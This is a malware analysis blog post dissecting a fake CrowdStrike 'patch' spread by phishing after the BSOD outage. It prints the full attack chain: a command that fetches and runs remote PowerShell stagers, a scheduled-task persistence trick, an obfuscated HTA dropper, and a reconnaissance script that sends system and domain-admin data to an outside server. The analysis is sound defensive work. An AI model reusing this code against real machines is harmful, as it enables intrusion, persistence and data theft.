Malware Report: CrowdStrike's BSOD Bug and the Rise of Fake Support Scams
In a dramatic turn of events, CrowdStrike's latest update inadvertently triggered the dreaded Blue Screen of Death (BSOD) for numerous users. As if the chaos wasn't enough, opportunistic threat actors seized the moment, posing as CrowdStrike support to distribute malware...
Figure 1: Fake Crowdstrike Support Email
In a dramatic turn of events, CrowdStrike's latest update inadvertently triggered the dreaded Blue Screen of Death (BSOD) for numerous users, disrupting millions of systems around the globe. As if the chaos wasn't enough, opportunistic threat actors seized the moment, posing as CrowdStrike support to distribute malware under the guise of critical fixes. This blog post unravels the double-edged disaster, exposing the cunning strategies of these digital impostors.
Disclaimer
The content presented on this blog is intended for educational purposes only. The information provided is designed to increase awareness and understanding of cybersecurity concepts, strategies, and practices. The scenarios, techniques, and tools discussed are for learning and informational purposes and should not be used for any illegal or unethical activities. The author and contributors are not responsible for any misuse of the information provided. Readers are encouraged to apply the knowledge gained from this blog responsibly and in accordance with all applicable laws and regulations.
The Zip
Firstly, I start things of by grabbing the zip file of this so called “patch” from the URL found in the email (hxxps[://]files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/cs-patch-19[.]zip). Inside the zip lies a CMD file titled “CS_patch_19.07.24.cmd". See Artifacts section for more details.
Figure 2: Contents of zip file after extraction
CMD File Analysis
The CMD file contains the following command:
"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell -c iex (iwr [https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1](https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1));iwr [https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2](https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2) -o $env:C:\Users\[REDACTED]\Documents\update.hta;
Here is a breakdown of the script:
This script is a command that uses forfiles.exe to execute a PowerShell command. Let's break it down step by step:
1. ForFiles.exe:
"C:\\Windows\\System32\\forfiles.exe"
- This is the path to the
forfilesutility, which is a command-line tool in Windows that selects files and runs a command on each file that meets certain criteria.
2. VSS:
/p C:\\Windows\\Vss
- The
/poption specifies the path to the directory whereforfilesshould operate. In this case, it’s pointing to theC:\\Windows\\Vssdirectory, which is the Volume Shadow Copy Service (VSS) directory in Windows.
3. Update.hta:
/c "powershell -c iex (iwr <https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1>);iwr <https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2> -o $env:C:\\Users\\[REDACTED]\\Documents\\update.hta"
-
The
/coption specifies the command to execute for each file. In this case, the command is invoking PowerShell to run a script. -
powershell -c: Runs the command specified in quotes directly in PowerShell. -
iex (iwr <https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1>):iexstands forInvoke-Expression, which is used to execute the command or expression provided to it.iwris an alias forInvoke-WebRequest, which is used to download content from a URL.- This part of the script downloads and executes a script from the URL
https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1. The contents of the file at that URL are executed directly in PowerShell. - Stager1 Script:
Figure 3: Stage 1 script that get executed by CMD scriptpowershell -w hidden -e MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQAcwAxAD0AJABlAG4AdgA6AHQAbQBwACsAIgBcAHUAcABkAGEAdABlAC4AaAB0AGEAIgA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AYwByAGUAYQB0AGUAIAAvAFMAYwAgAG0AaQBuAHUAdABlACAALwBmACAALwBUAG4AIABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlACAALwBtAG8AIAAzADAAIAAvAHQAcgAgACIAbQBzAGgAdABhACAAJABzADEAIgA=Following this is stage 2 of the script:
-
iwr <https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2> -o $env:C:\\Users\\[REDACTED]\\Documents\\update.hta:-
Again,
iwris used to download a file, but this time theooption (short forOutFile) is used to save the downloaded content to a specific file. -
The script downloads a file from
https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2and saves it toC:\\Users\\[REDACTED]\\Documents\\update.hta. -
Stager2 Script:
Figure 4: Stage 2 script that get executed by CMD script<!DOCTYPE html> <html> <head> <HTA:APPLICATION ID="#" SYSMENU = "no" BORDER="no" SHOWINTASKBAR="no" CAPTION="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize" > <script type="text/vbscript"> Set r = CreateObject("WinHttp.WinHttpRequest.5.1") r.Open "GET", "http"&"://ipinfo"&".io/coun"&"try", False r.Send geo = InStr(r.responseText, "VN") If geo <= 0 Then self.close End If Set o = CreateObject("WS"+"cr"+"ip"+"t."+"S"+"he"+"l"+"l") mostlycloudfortomorrowcontent = "qnvdsrIDmM!,onQsNghm!!,dydbTUHno!!CXq@RR!!,bnlL`Oe!hdy)ZRxrudl/Udyu/Dobnehof\;;TUG9/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)&`VXfJBfnJDemeB0YcVmQXlqmX2PfW3mtL{KgP38ubIW1[YKUdYO1[V1qMoCiboSw[lSwcVGqchjfMVWyHBSFXVy{[R@qHB0wbh@nHB0tc2PfKDWtekqWT1WRSD4USD8OPTmNJRjOBh@fHBC6EPnfHB@fHB@fHBSEcET1bV[MSR@8HBKDU10CRT57HD4QXF4fchHOBh@fHBC8HFWrb3Tfdx@jP3v0OIGlR1TfQR@hSD8OPTmNNhC[SWOfclCtHo1OBhSEcET1bV[MSR@sQR@hT0mUWDWORT4FU{qfclCtHh@sHBfnb2m{eFWu`V4lcxjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcjmPP18NSjmINlCtXF5hHBrfJBiqbFOwcl[q[x@wXVyrJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtUjWTT0SCWEqfclCtHh@sHBfnclW1b2SieB@u[hjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcj4GWG[KSWb7XF4fchHfJx@nJF4meBC3`VW2JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtWDGUR1yKT0P7XF4fchHfJx@nJISib3ur`YO1JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtW1iQPT0KNlCtXF5hHBrfJBi2`F8icVjqHB0pc3mtHBKfchHqEPnjP3v0OIGlR1TfJ{1fHlCtXF4WT1WRUjGOSUqfclCtHh@sHBfnclW1HIW{[YHfKFWtekq0b3WxclGu[R@w[F8uXVmtJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtSD8OPTmNHDGDUTmNT{qfclCtHh@sHBfnclW1HFexc2WvHBKjc30i`V5fXVSu`V4{Hh@w[F8uXVmtHBjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcjSGT1uTU0@7XF4fchHfJx@nS3W1MTOn`VyjRYSmcR@nV3Wtelmxc34u[V41YUn7[3W1[l8r[FWxbFG1`Bfh[FW{`2SwbBHqJRC9HD80eB0UeIKqclbqEPnjP3v0OIGlR1TfJ{1fHlCtXF4CWkqfclCtHh@sHBiI[YPuW30qU3Kp[VO1HB0NXV0mb2CiX3TfHoKwc2SbT3WkeYKqeImE[V41[YHxHh@uTYWmbojfHmOGUDWEWB@pHD[RU11fPV41`W[qboW{TIKw[IWkeBHqMlSqb2CrXYmNXV0mEPnjVVWxUYm2[YHfQRCcT2m{eFWuMmSmdIPtSV4kc3SqcleeNkqWWDX5MjemeDK4eFW{JBSEcET1bV[MSRjOBhSGclO[[YHfQWuEc343[YK1YUn7WF8BXYOmOkSUeIKqclbnKGmmbj04e3WxJP1JKGW4Lj4Fbx@8HBH5NED1OUD2OVKhNVWlLEf5X{Xy[kWiXk@5NUbvLVSjOxH6EPnjbEC{eG@1bkSuHE1fPIuvXYO{QRSWdUKNSoL6[FG1XU1jSV4kVVWxgP1J`YexHB0Wbljf`IS1bEnwM30m[3GkdVKmbl4me2LtX38uM3On[VOs`V5tbFivHB0O[YSnc3PfTD8UWB@uPl8jdR@jbEC{eG@1bkSu&(((" dIaNadIaNadIaNadIaNadIaNadIaNa = "" For i = 0 To Len(mostlycloudfortomorrowcontent) - 1 dIaNadIaNadIaNadIaNadIaNadIaNa = dIaNadIaNadIaNadIaNadIaNadIaNa & Chr(Asc(Mid(mostlycloudfortomorrowcontent, i + 1, 1)) Xor 1) Next o.run dIaNadIaNadIaNadIaNadIaNadIaNa, 0, false self.close </script> </head> <body> </body> </html>
-
Stager1 Analysis:
1. PowerShell Command:
powershell -w hidden -e MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQAcwAxAD0AJABlAG4AdgA6AHQAbQBwACsAIgBcAHUAcABkAGEAdABlAC4AaAB0AGEAIgA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AYwByAGUAYQB0AGUAIAAvAFMAYwAgAG0AaQBuAHUAdABlACAALwBmACAALwBUAG4AIABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlACAALwBtAG8AIAAzADAAIAAvAHQAcgAgACIAbQBzAGgAdABhACAAJABzADEAIgA=
w hidden: This argument hides the PowerShell window when the script is executed. This is often used to run scripts stealthily without showing any command windows to the user.e(orencodedCommand): This flag tells PowerShell that the following string is a Base64-encoded command that needs to be decoded and executed.
2. Decoding the Base64 String:
The Base64 encoded string is:
MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQAcwAxAD0AJABlAG4AdgA6AHQAbQBwACsAIgBcAHUAcABkAGEAdABlAC4AaAB0AGEAIgA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AYwByAGUAYQB0AGUAIAAvAFMAYwAgAG0AaQBuAHUAdABlACAALwBmACAALwBUAG4AIABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlACAALwBtAG8AIAAzADAAIAAvAHQAcgAgACIAbQBzAGgAdABhACAAJABzADEAIgA=
Let's decode this string to reveal the actual PowerShell script.
3. Decoded PowerShell Script:
After decoding the Base64 string, the decoded script is:
1..60 | % {sleep 1};$s1=$env:tmp+"\\\\update.hta";schtasks /create /Sc minute /f /Tn MicrosoftEdgeUpdate /mo 30 /tr "mshta $s1"
4. Breaking Down the Decoded Script:
1..60 | % {sleep 1};:- This is a loop that iterates 60 times, with each iteration pausing the execution for 1 second (
sleep 1). This effectively introduces a delay of 60 seconds before the next command is executed.
- This is a loop that iterates 60 times, with each iteration pausing the execution for 1 second (
$s1=$env:tmp+"\\\\update.hta";:- This command sets the variable
$s1to the path of a file namedupdate.htain the system's temporary directory ($env:tmp). TheHTA(HTML Application) file format can be used to execute scripts, which often makes it a tool for malicious activities.
- This command sets the variable
schtasks /create /Sc minute /f /Tn MicrosoftEdgeUpdate /mo 30 /tr "mshta $s1":- This command creates a new scheduled task using the Windows
schtasksutility. /Sc minute: The task is scheduled to run every minute./f: Forces the creation of the task, even if it exists./Tn MicrosoftEdgeUpdate: The name of the task isMicrosoftEdgeUpdate./mo 30: The task is set to trigger every 30 minutes./tr "mshta $s1": The task runs themshtacommand, which executes theupdate.htafile stored in the temporary directory.
- This command creates a new scheduled task using the Windows
Stager1 Summary:
This PowerShell script is designed to:
- Wait for 60 seconds.
- Create a scheduled task named
MicrosoftEdgeUpdatethat runs every 30 minutes. - The task uses
mshtato execute a file namedupdate.htalocated in the temporary directory.
Security Implications:
- Stealth Execution: The script is hidden from the user (
w hidden), making it harder to detect. - Scheduled Task Creation: The script creates a scheduled task that could persistently execute a potentially malicious script every 30 minutes.
- Potential Malware: The use of an
.htafile (HTML Application) andmshtais a common technique used in malware to execute arbitrary code.
This script has characteristics of a potential malware or part of a persistence mechanism used by attackers to maintain access to a compromised system.
Stager2 Analysis:
This script is an HTML Application (HTA) file written in VBScript. HTA files are similar to regular HTML files but have the ability to run scripts with full access to the Windows environment, making them potentially dangerous if used maliciously. Let’s break down the components of the script:
1. HTA Metadata:
<HTA:APPLICATION
ID="#"
SYSMENU = "no"
BORDER="no"
SHOWINTASKBAR="no"
CAPTION="no"
SINGLEINSTANCE="yes"
WINDOWSTATE="minimize">
ID="#": Assigns an ID to the application, though it's set to#, which is unusual and might indicate a placeholder.SYSMENU="no": Disables the system menu (the menu that appears when you right-click the title bar).BORDER="no": Removes the window border.SHOWINTASKBAR="no": Prevents the application from showing in the taskbar.CAPTION="no": Removes the window caption (title).SINGLEINSTANCE="yes": Ensures only one instance of the HTA runs at a time.WINDOWSTATE="minimize": Starts the application minimized.
2. VBScript Section:
<script type="text/vbscript">
Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
r.Open "GET", "http"&"://ipinfo"&".io/coun"&"try", False
r.Send
geo = InStr(r.responseText, "VN")
If geo <= 0 Then
self.close
End If
Set r = CreateObject("WinHttp.WinHttpRequest.5.1"): Creates an object to make HTTP requests.r.Open "GET", "<http://ipinfo.io/country>", False: Opens an HTTP GET request to theipinfo.ioservice to retrieve the user's country information.r.Send: Sends the HTTP request.geo = InStr(r.responseText, "VN"): Checks if the response (the country code) contains"VN"(which stands for Vietnam).If geo <= 0 Then self.close: If the country code is not"VN", the script closes the HTA, essentially exiting the program. This is a form of geo-filtering, possibly intended to target or exclude users in Vietnam.
3. Decryption and Execution:
Set o = CreateObject("WS"+"cr"+"ip"+"t."+"S"+"he"+"l"+"l")
mostlycloudfortomorrowcontent = "qnvdsrIDmM!,onQsNghm!!,dydbTUHno!!CXq@RR!!..."
Set o = CreateObject("WS"+"cr"+"ip"+"t."+"S"+"he"+"l"+"l"): Creates an object that can execute shell commands (WScript.Shell). The string is broken up to avoid simple detection methods.mostlycloudfortomorrowcontent: This variable contains an obfuscated/encrypted string, which appears to be a payload or script.
dIaNadIaNadIaNadIaNadIaNadIaNa = ""
For i = 0 To Len(mostlycloudfortomorrowcontent) - 1
dIaNadIaNadIaNadIaNadIaNadIaNa = dIaNadIaNadIaNadIaNadIaNadIaNa & Chr(Asc(Mid(mostlycloudfortomorrowcontent, i + 1, 1)) Xor 1)
Next
o.run dIaNadIaNadIaNadIaNadIaNadIaNa, 0, false
dIaNadIaNadIaNadIaNadIaNadIaNa = "": Initializes an empty string variable.For i = 0 To Len(mostlycloudfortomorrowcontent) - 1: Iterates through each character of themostlycloudfortomorrowcontentstring.Chr(Asc(Mid(mostlycloudfortomorrowcontent, i + 1, 1)) Xor 1): This line decrypts each character of themostlycloudfortomorrowcontentstring.Midextracts one character at a time.Ascconverts the character to its ASCII code.Xor 1applies a bitwise XOR operation with1, effectively flipping the least significant bit.Chrconverts the modified ASCII code back to a character.
o.run dIaNadIaNadIaNadIaNadIaNadIaNa, 0, false: Executes the decrypted content using the shell object. The0parameter hides the window, andfalseensures the script continues running without waiting for the command to finish.
4. Closing the Script:
self.close
self.close: Closes the HTA window, ending the script.
Let’s deobfuscate the mostlycloudfortomorrowcontent string in Python to see what this script is hiding.
Deobfuscating Stager2
obfuscated_string = ("qnvdsrIDmM!,onQsNghm!!,dydbTUHno!!CXq@RR!!,bnlL`Oe!hdy)ZRxrudl/Udyu/Dobnehof\;;TUG9/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)&`VXfJBfnJDemeB0YcVmQXlqmX2PfW3mtL{KgP38ubIW1[YKUdYO1[V1qMoCiboSw[lSwcVGqchjfMVWyHBSFXVy{[R@qHB0wbh@nHB0tc2PfKDWt" +
"ekqWT1WRSD4USD8OPTmNJRjOBh@fHBC6EPnfHB@fHB@fHBSEcET1bV[MSR@8HBKDU10CRT57HD4QXF4fchHOBh@fHBC8HFWrb3Tfdx@jP3v0OIGlR1TfQR@hSD8OPTmNNhC[SWOfclCtHo1OBhSEcET1bV[MSR@sQR@hT0mUWDWORT4FU{qfclCtHh@sHBfnb2m{eFWu`V4lcxjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4f" +
"cjmPP18NSjmINlCtXF5hHBrfJBiqbFOwcl[q[x@wXVyrJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtUjWTT0SCWEqfclCtHh@sHBfnclW1b2SieB@u[hjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcj4GWG[KSWb7XF4fchHfJx@nJF4meBC3`VW2JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtWDG" +
"UR1yKT0P7XF4fchHfJx@nJISib3ur`YO1JR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtW1iQPT0KNlCtXF5hHBrfJBi2`F8icVjqHB0pc3mtHBKfchHqEPnjP3v0OIGlR1TfJ{1fHlCtXF4WT1WRUjGOSUqfclCtHh@sHBfnclW1HIW{[YHfKFWtekq0b3WxclGu[R@w[F8uXVmtJR@u`l8qch@hXF5hJP1JKDOrOUSy[juGHBr8HBKfclCtSD8OP" +
"TmNHDGDUTmNT{qfclCtHh@sHBfnclW1HFexc2WvHBKjc30i`V5fXVSu`V4{Hh@w[F8uXVmtHBjfMVqw`V5fHlCtHhjOBhSEcET1bV[MSR@sQR@hXF4fcjSGT1uTU0@7XF4fchHfJx@nS3W1MTOn`VyjRYSmcR@nV3Wtelmxc34u[V41YUn7[3W1[l8r[FWxbFG1`Bfh[FW{`2SwbBHqJRC9HD80eB0UeIKqclbqEPnjP3v0OIGlR1TfJ{1fHlCtXF4CWkqfclCtHh@sHBiI[YP" +
"uW30qU3Kp[VO1HB0NXV0mb2CiX3TfHoKwc2SbT3WkeYKqeImE[V41[YHxHh@uTYWmbojfHmOGUDWEWB@pHD[RU11fPV41`W[qboW{TIKw[IWkeBHqMlSqb2CrXYmNXV0mEPnjVVWxUYm2[YHfQRCcT2m{eFWuMmSmdIPtSV4kc3SqcleeNkqWWDX5MjemeDK4eFW{JBSEcET1bV[MSRjOBhSGclO[[YHfQWuEc343[YK1YUn7WF8BXYOmOkSUeIKqclbnKGmmbj04e3WxJP1" +
"JKGW4Lj4Fbx@8HBH5NED1OUD2OVKhNVWlLEf5X{Xy[kWiXk@5NUbvLVSjOxH6EPnjbEC{eG@1bkSuHE1fPIuvXYO{QRSWdUKNSoL6[FG1XU1jSV4kVVWxgP1J`YexHB0Wbljf`IS1bEnwM30m[3GkdVKmbl4me2LtX38uM3On[VOs`V5tbFivHB0O[YSnc3PfTD8UWB@uPl8jdR@jbEC{eG@1bkSu&(((")
# Function to XOR each character with 1 and convert it back to characters
def xor_decode(encoded_str):
decoded_chars = [chr(ord(char) ^ 1) for char in encoded_str]
return ''.join(decoded_chars)
# Decode the obfuscated string
decoded_string = xor_decode(obfuscated_string)
print(decoded_string)
Here’s how the script works:
I assign a variable named obfuscated_string, as the name suggest this variable contains the obfuscated string from the stager 2 HTA script which was assigned to mostlycloudfortomorrowcontent. Following the obfuscated_string variable, a function named xor_decode is defined which decodes a given encoded string (in this case the obfuscated_string variable) using a simple XOR operation. Let's break down how the function works:
1. Function Definition:
def xor_decode(encoded_str):
- The function
xor_decodetakes one argumentencoded_str, which is expected to be a string that has been encoded using a specific XOR operation.
2. List Comprehension to Decode Characters:
decoded_chars = [chr(ord(char) ^ 1) for char in encoded_str]
- This line of code performs the core decoding operation using a list comprehension. Let’s break down each part:
for char in encoded_str: This iterates over each character (char) in the input stringencoded_str.ord(char): Theord()function takes a character (char) and returns its ASCII value (an integer).ord(char) ^ 1: The XOR operation (^) is applied to the ASCII value of the character and1. XOR with1effectively flips the least significant bit of the ASCII value.chr(ord(char) ^ 1): Thechr()function converts the resulting integer back into a character after the XOR operation.- The result is a list of decoded characters (
decoded_chars), where each character inencoded_strhas been XORed with1.
3. Join Decoded Characters into a String:
return ''.join(decoded_chars)
- After decoding, the list of characters is joined back together into a single string using
''.join(decoded_chars). - The decoded string is then returned as the output of the function.
After running the script to deobfuscate the string, I left with more obfuscated Powershell…
powersHElL -noPrOfil -execUTIon BYpASS -comMaNd iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWYgKCgoKEdldC1XbWlPYmplY3QgV2luMzJfQ29tcHV0ZXJTeXN0ZW0pLnBhcnRvZmRvbWFpbikgLWVxICRGYWxzZSApIC1vciAoIC1ub3QgJEVudjpVU0VSRE5TRE9NQUlOKSkNCiAgICB7DQogICAgICAgICRDbDU0cWZLRSA9ICJET01BSU46IE5PYG5gbiINCiAgICB9IGVsc2UgeyAkQ2w1NHFmS0UgPSAiRE9NQUlOOiBZRVNgbmBuIn0NCiRDbDU0cWZLRSArPSAiU1lTVEVNSU5GTzpgbmBuIiArICgoc3lzdGVtaW5mbykgLWpvaW4gImBuIikNCiRDbDU0cWZLRSArPSAiYG5gbklQQ09ORklHOmBuYG4iICsgKChpcGNvbmZpZyAvYWxsKSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuTkVUU1RBVDpgbmBuIiArICgobmV0c3RhdCAtZikgLWpvaW4gImBuIikNCiRDbDU0cWZLRSArPSAiYG5gbk5FVFZJRVc6YG5gbiIgKyAoKG5ldCB2aWV3KSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuVEFTS0xJU1Q6YG5gbiIgKyAoKHRhc2tsaXN0KSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuV0hPQU1JOmBuYG4iICsgKCh3aG9hbWkpIC1qb2luICJgbiIpDQokQ2w1NHFmS0UgKz0gImBuYG5VU0VSTkFNRTpgbmBuIiArICgobmV0IHVzZXIgJGVudjp1c2VybmFtZSAvZG9tYWluKSAtam9pbiAiYG4iKQ0KJENsNTRxZktFICs9ICJgbmBuRE9NQUlOIEFETUlOUzpgbmBuIiArICgobmV0IGdyb3VwICJkb21haW4gYWRtaW5zIiAvZG9tYWluICkgLWpvaW4gImBuIikNCiRDbDU0cWZLRSArPSAiYG5gbkRFU0tUT1A6YG5gbiIgKyAoR2V0LUNoaWxkSXRlbSAoW2Vudmlyb25tZW50XTo6Z2V0Zm9sZGVycGF0aCgiZGVza3RvcCIpKSB8IE91dC1TdHJpbmcpDQokQ2w1NHFmS0UgKz0gImBuYG5BVjpgbmBuIiArIChHZXQtV21pT2JqZWN0IC1OYW1lc3BhY2UgInJvb3RcU2VjdXJpdHlDZW50ZXIyIiAtUXVlcnkgIlNFTEVDVCAqIEZST00gQW50aVZpcnVzUHJvZHVjdCIpLmRpc3BsYXlOYW1lDQokWWVyTXl3ZXIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRDbDU0cWZLRSkNCiRFbmNZZXIgPVtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoJFllck15d2VyKQ0KJFV5Mk5GcyA9ICI4ODE0NTE3NWJiOWVmMDg4YzYxZjVhYjA4OTcwMWRkNyI7DQokcDBzdFA0cjRtID0gQHtwYXNzPSRVeTJORnM7ZGF0YT0kRW5jWWVyfQ0KaXdyIC1VcmkgaHR0cDovL21lZ2FjeWJlcm5ld3MuY29tL2NoZWNraW4ucGhwIC1NZXRob2QgUE9TVCAtQm9keSAkcDBzdFA0cjRt')))
Breakdown:
powersHElL -noPrOfil -execUTIon BYpASS -comMaNd:powersHElL: This starts a PowerShell session. The mixed-case usage of "powersHElL" (instead of "powershell") is intended to bypass basic string detection mechanisms.noPrOfil: This flag tells PowerShell not to load the user profile when starting the session, ensuring a clean environment without any custom configurations or scripts that might be in the user’s profile.execUTIon BYpASS: This flag overrides the execution policy for the session, allowing the script to run even if the system's execution policy would normally prevent it.comMaNd: This indicates that what follows is a command to be executed by PowerShell.
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[BASE64_STRING]'))):iex(Invoke-Expression): This cmdlet is used to execute the string as a PowerShell command. It effectively runs whatever code is inside the parentheses after it has been decoded from Base64.[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[BASE64_STRING]')):[System.Text.Encoding]::UTF8.GetString(...): Converts the resulting byte array from Base64 back into a readable string using UTF-8 encoding.[System.Convert]::FromBase64String('[BASE64_STRING]'): Decodes the Base64-encoded string (in this case represented by[BASE64_STRING]) back into its original byte array.
- In essence, this part of the script decodes the Base64 string and then runs the decoded content as a PowerShell command.
This decoded PowerShell script is designed to collect detailed information about the system it runs on, encode that information into Base64, and then send it to a remote server. Here's a breakdown of the script:
1. Domain Check:
if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
{
$Cl54qfKE = "DOMAIN: NO`n`n"
} else { $Cl54qfKE = "DOMAIN: YES`n`n"}
Get-WmiObject Win32_ComputerSystem).partofdomain: This command checks if the computer is part of a domain by querying theWin32_ComputerSystemWMI class.$Env:USERDNSDOMAIN: This checks if theUSERDNSDOMAINenvironment variable is set, which is typically set for domain-joined machines.- The
ifstatement:- If the computer is not part of a domain (
partofdomain -eq $False) or theUSERDNSDOMAINvariable is not set, it sets the$Cl54qfKEvariable to "DOMAIN: NO". - Otherwise, it sets the variable to "DOMAIN: YES".
- If the computer is not part of a domain (
2. Collecting System Information:
$Cl54qfKE += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
$Cl54qfKE += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
$Cl54qfKE += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
$Cl54qfKE += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
$Cl54qfKE += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
$Cl54qfKE += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
$Cl54qfKE += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
$Cl54qfKE += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
$Cl54qfKE += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
$Cl54qfKE += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
The script concatenates various system and network information to the $Cl54qfKE variable:
systeminfo: Outputs detailed information about the Windows system.ipconfig /all: Outputs detailed network configuration, including IP addresses, DNS servers, etc.netstat -f: Displays active network connections and their corresponding FQDNs (Fully Qualified Domain Names).net view: Lists shared resources available on the local network.tasklist: Lists all running processes on the system.whoami: Displays the current logged-in user's information.net user $env:username /domain: Retrieves detailed information about the current user from the domain.net group "domain admins" /domain: Retrieves information about members of the "domain admins" group.Get-ChildItem ([environment]::getfolderpath("desktop")): Lists all files and directories on the current user's desktop.Get-WmiObject -Namespace "root\\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct": Retrieves the name of the antivirus product installed on the system.
3. Encoding the Information:
$YerMywer = [System.Text.Encoding]::UTF8.GetBytes($Cl54qfKE)
$EncYer =[Convert]::ToBase64String($YerMywer)
$YerMywer = [System.Text.Encoding]::UTF8.GetBytes($Cl54qfKE): Converts the collected information into a byte array using UTF-8 encoding.$EncYer =[Convert]::ToBase64String($YerMywer): Encodes the byte array into a Base64 string, stored in$EncYer.
4. Preparing and Sending the Data:
$Uy2NFs = "88145175bb9ef088c61f5ab089701dd7";
$p0stP4r4m = @{pass=$Uy2NFs;data=$EncYer}
iwr -Uri <http://megacybernews.com/checkin.php> -Method POST -Body $p0stP4r4m
$Uy2NFs = "88145175bb9ef088c61f5ab089701dd7";: This variable appears to be a static passphrase or identifier.$p0stP4r4m = @{pass=$Uy2NFs;data=$EncYer}: Creates a hashtable (key-value pairs) that contains the passphrase and the encoded data.iwr -Uri <http://megacybernews.com/checkin.php> -Method POST -Body $p0stP4r4m:iwr(Invoke-WebRequest): Sends an HTTP request to the specified URL.Uri <http://megacybernews.com/checkin.php:> The URL where the data is sent.Method POST: Specifies that the request should use the POST method.Body $p0stP4r4m: Sends thep0stP4r4mhashtable as the body of the POST request, which includes the passphrase and the Base64-encoded system information.
Summary:
This script is likely part of a reconnaissance phase in setup for a cyber attack. It collects a variety of system and network information, encodes it into a Base64 string, and sends it to a remote server via an HTTP POST request.
Key Takeaways:
- The script gathers detailed information about the system, network, processes, and users.
- The information is then encoded and sent to an external server, potentially for further analysis or to aid in an attack.
- This type of script is commonly used in malicious activities to gather intelligence on the target system before launching further attacks.
Stager2 Summary:
This HTA script performs the following actions:
- Geo-filtering: It checks the user's location by querying
ipinfo.iofor the country code. If the country is not Vietnam (VN), the script terminates. - Decryption and Execution: The script contains an obfuscated or encrypted payload, which it decrypts and executes using the Windows Script Host (
WScript.Shell). The exact nature of the payload is hidden due to encryption, but it could potentially be malicious.
Security Implications:
This script is potentially dangerous, as it:
- Executes hidden commands on the system.
- Includes obfuscated content, which is a common tactic in malware to evade detection.
- Uses geo-targeting, which is often seen in targeted attacks where the attacker wants to avoid detection in specific regions.
If encountered in the wild, this script should be treated as suspicious and analyzed in a controlled environment.
MITRE ATT&CK® Techniques
Indicators of Compromise
Resources
Hackers are already taking advantage of the CrowdStrike outage chaos | CNN Business
Let's Connect!
